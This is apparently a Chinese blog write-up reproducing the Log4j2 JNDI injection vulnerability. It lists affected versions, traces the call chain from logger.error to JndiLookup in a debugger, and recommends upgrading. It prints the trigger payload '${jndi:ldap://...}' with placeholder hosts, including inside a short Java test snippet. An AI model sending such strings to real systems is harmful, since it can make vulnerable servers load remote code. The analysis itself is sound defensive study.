log4j2漏洞复现

1.漏洞描述

Log4j2是Java开发常用的日志框架,该漏洞触发条件低,危害大。

2.影响版本

log4j-core2.x < 2.17.1

3.漏洞分析

触发漏洞的payload为${jndi:ldap://xxx.xxx.xx}
这串字符串毫无疑问是jndi注入特征,触发漏洞的函数为JndiLookup.lookup()

  1. log4j2的触发点是 jndiManager.lookup(jndiName)

编写一个简单的漏洞代码开始追踪利用链

  1. public static void main(String[] args) {
  2.     logger.error("${jndi:ldap://1111.xxx.xxx.xxx}");
  3. }
  • 完整的调用链如下所示:

从logger.error往下一直追踪,直到追踪到这里,这一步可以通过动态调试知道调用时是哪一个子类
callAppender:84, AppenderControl (org.apache.logging.log4j.core.config)
log:63, DefaultReliabilityStrategy (org.apache.logging.log4j.core.config)
(如果不好跟踪可以直接在第二个log函数打断点,继续跟进)
processLogEvent:498, LoggerConfig (org.apache.logging.log4j.core.config)
callAppenders:540, LoggerConfig (org.apache.logging.log4j.core.config)
该函数里是一个循环,将debug i设置为i==8,直接跳转到MessagePatternConverter这个类,该类是存在漏洞的类
截屏2022-03-21 上午3.18.14
callAppenderPreventRecursion:120, AppenderControl (org.apache.logging.log4j.core.config)
callAppender0:129, AppenderControl (org.apache.logging.log4j.core.config)
tryCallAppender:156, AppenderControl (org.apache.logging.log4j.core.config)
append:181, AbstractOutputStreamAppender (org.apache.logging.log4j.core.appender)
tryAppend:190, AbstractOutputStreamAppender (org.apache.logging.log4j.core.appender)
directEncodeEvent:197, AbstractOutputStreamAppender (org.apache.logging.log4j.core.appender)
encode:59, PatternLayout (org.apache.logging.log4j.core.layout)
这里可以看到event已经存放了输入的日志字符串
截屏2022-03-21 上午2.38.31
encode:229, PatternLayout (org.apache.logging.log4j.core.layout)
toText:244, PatternLayout (org.apache.logging.log4j.core.layout)
toSerializable:344, PatternLayout$PatternSerializer (org.apache.logging.log4j.core.layout)
format:38, PatternFormatter (org.apache.logging.log4j.core.pattern)
format:132, MessagePatternConverter (org.apache.logging.log4j.core.pattern)
replace:467, StrSubstitutor (org.apache.logging.log4j.core.lookup)
substitute:912, StrSubstitutor (org.apache.logging.log4j.core.lookup)
substitute:1033, StrSubstitutor (org.apache.logging.log4j.core.lookup)
这里是一个while循环,经过一系列操作后进入resolveVariable函数
截屏2022-03-21 上午2.54.03
resolveVariable:1110, StrSubstitutor (org.apache.logging.log4j.core.lookup)
该处调用链显示了很多支持的内容
截屏2022-03-21 上午2.56.14
直接跟进jndi类的lookup方法,可以找到jndiManager.lookup调用
lookup:221, Interpolator (org.apache.logging.log4j.core.lookup)
截屏2022-03-21 上午3.24.42

4.漏洞修复

升级到2.17.1及其以上安全版本